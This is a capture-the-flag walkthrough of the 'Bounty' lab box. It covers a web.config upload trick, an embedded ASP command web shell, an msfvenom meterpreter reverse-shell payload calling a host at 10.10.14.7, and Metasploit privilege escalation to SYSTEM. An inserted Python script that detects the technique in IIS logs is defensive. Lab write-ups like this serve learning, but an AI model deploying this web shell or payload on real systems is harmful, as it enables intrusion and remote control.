Bounty

OS: Windows, Difficulty: Easy, IP: 10.10.10.93

Initial Enumeration

# Nmap 7.70 scan initiated Thu Jul 18 22:03:22 2019 as: nmap --max-rate 1000 --min-parallelism 1000 -p- -T5 -oN T-all 10.10.10.93
Nmap scan report for 10.10.10.93
Host is up (0.22s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

# Nmap done at Thu Jul 18 22:05:34 2019 -- 1 IP address (1 host up) scanned in 131.98 seconds
gobuster dir -k -t 200 -w /usr/share/wordlists/dirb/big.txt -o dirb-big -u http://10.10.10.93 -x asp,aspx
/aspnet_client (Status: 301)
/transfer.aspx (Status: 200)
/uploadedfiles (Status: 301)

Using the following links I was able to get to a working web shell.

web.config code

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
   <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />        
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<---- ASP CODE ---->
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>


<HTML>
<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's local address:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<% szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)%>
</p>
<br>
</BODY>
</HTML>

Now I created a payload to get a meterpreter session and uploaded it as shell.exe.config, which is allowed by the server. Using the web shell I had, I renamed the file to shell.exe and then ran it.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.7 LPORT=1337 -f exe > shell.exe.config
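The upload form accepted any file ending in .config, and the uploaded web.config then re-mapped *.config to asp.dll while removing the request filtering rules that would normally block it. As an added example that is not part of this writeup, the following Python script scans IIS W3C log lines for the two signs of that technique: a 200 response for any *.config under the upload directory (meaning the .config extension filter and the web.config hidden segment no longer apply), and a cmd= query string on such a file (the parameter name the web shell above uses). The log lines and the /uploadedfiles/ path are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample IIS W3C log (not taken from the box). The cmd= query
# mirrors the "cmd" form field of the ASP web shell shown in the writeup.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 7.5
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2019-07-18 16:40:01 10.10.10.93 GET /transfer.aspx - 80 10.10.14.7 200
2019-07-18 16:40:12 10.10.10.93 POST /transfer.aspx - 80 10.10.14.7 200
2019-07-18 16:40:15 10.10.10.93 GET /uploadedfiles/web.config cmd=whoami 80 10.10.14.7 200
2019-07-18 16:41:10 10.10.10.93 GET /uploadedfiles/shell.exe.config - 80 10.10.14.7 200
2019-07-18 16:42:00 10.10.10.93 GET /uploadedfiles/logo.png - 80 10.10.14.7 200
2019-07-18 16:42:30 10.10.10.93 GET /aspnet_client/ - 80 10.10.14.7 301
"""

UPLOAD_DIR = "/uploadedfiles/"  # assumed: the upload target found by gobuster


def parse_w3c(text):
    """Yield one dict per request line, keyed by the names in the #Fields header."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if len(values) == len(fields):
            yield dict(zip(fields, values))


def find_config_abuse(text):
    """Return (time, uri, reason) for requests that indicate web.config upload abuse.

    Normal request filtering never serves *.config (the .config extension is
    denied and web.config is a hidden segment), so a 200 for one under the
    upload directory means those rules were removed; a cmd= query is shell use.
    """
    findings = []
    for rec in parse_w3c(text):
        stem = rec["cs-uri-stem"].lower()
        if not (stem.startswith(UPLOAD_DIR) and stem.endswith(".config")):
            continue
        if rec["sc-status"] != "200":
            continue
        query = unquote_plus(rec["cs-uri-query"])
        if re.search(r"(^|&)cmd=", query):
            reason = "web shell command: " + query
        elif stem.endswith("/web.config"):
            reason = "web.config served from upload dir (hidden segment bypassed)"
        else:
            reason = "uploaded .config served (extension filter bypassed)"
        findings.append((rec["time"], rec["cs-uri-stem"], reason))
    return findings


if __name__ == "__main__":
    for hit in find_config_abuse(SAMPLE_LOG):
        print(*hit)
```

On a real host the same logic runs over the files under %SystemDrive%\inetpub\logs\LogFiles once the #Fields header of that site is honoured, which the parser does by reading the column names rather than assuming positions.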

NOTE: I was not able to find the user.txt flag at first so I just jumped ahead and went for root, however, I had to make the hidden files visible to get the user.txt file, which I realised way too late.

The shell was an x86 shell, so I had to upgrade to an x64 shell and then run the exploit suggester.

msf5 exploit(windows/local/payload_inject) > use post/multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set SESSION 2
msf5 post(multi/recon/local_exploit_suggester) > exploit

[*] 10.10.10.93 - Collecting local exploits for x64/windows...
[*] 10.10.10.93 - 11 exploit checks are being tried...
[+] 10.10.10.93 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_014_wmi_recv_notif: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.93 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
[*] Post module execution completed

msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_092_schelevator
msf5 exploit(windows/local/ms10_092_schelevator) > exploit

[*] Started reverse TCP handler on 10.10.14.7:4444
[*] Preparing payload at C:\Windows\TEMP\CtBYgVrpsKo.exe
[*] Creating task: APiB17mL
[*] SUCCESS: The scheduled task "APiB17mL" has successfully been created.
[*] SCHELEVATOR
[*] Reading the task file contents from C:\Windows\system32\tasks\APiB17mL...
[*] Original CRC32: 0xd0da0fc9
[*] Final CRC32: 0xd0da0fc9
[*] Writing our modified content back...
[*] Validating task: APiB17mL
[*]
[*] Folder: \
[*] TaskName                                 Next Run Time          Status
[*] ======================================== ====================== ===============
[*] APiB17mL                                 8/1/2019 8:35:00 PM    Ready
[*] SCHELEVATOR
[*] Disabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Enabling the task...
[*] SUCCESS: The parameters of scheduled task "APiB17mL" have been changed.
[*] SCHELEVATOR
[*] Executing the task...
[*] Sending stage (179779 bytes) to 10.10.10.93
[*] SUCCESS: Attempted to run the scheduled task "APiB17mL".
[*] SCHELEVATOR
[*] Deleting the task...
[*] SUCCESS: The scheduled task "APiB17mL" was successfully deleted.
[*] SCHELEVATOR
[*] Meterpreter session 3 opened (10.10.14.7:4444 -> 10.10.10.93:49159) at 2019-07-18 23:12:11 +0530

This got me an NT AUTHORITY\SYSTEM shell.

User Own

C:\Users\merlin\Desktop>attrib *.* -h -s /s /d

C:\Users\merlin\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 5084-30B0

 Directory of C:\Users\merlin\Desktop

05/31/2018  12:17 AM    <DIR>          .
05/31/2018  12:17 AM    <DIR>          ..
05/30/2018  12:22 AM               282 desktop.ini
05/30/2018  11:32 PM                32 user.txt
               2 File(s)            314 bytes
               2 Dir(s)  11,854,745,600 bytes free
C:\Users\merlin\Desktop>type user.txt
e29ad***

Root Own

C:\Users\Administrator\Desktop>type root.txt
c837f***

Learning Outcome

Enumerate the web directories and file extensions a little better. Always open up the hidden files on the system as soon as you get a shell to make sure you do not miss anything important.
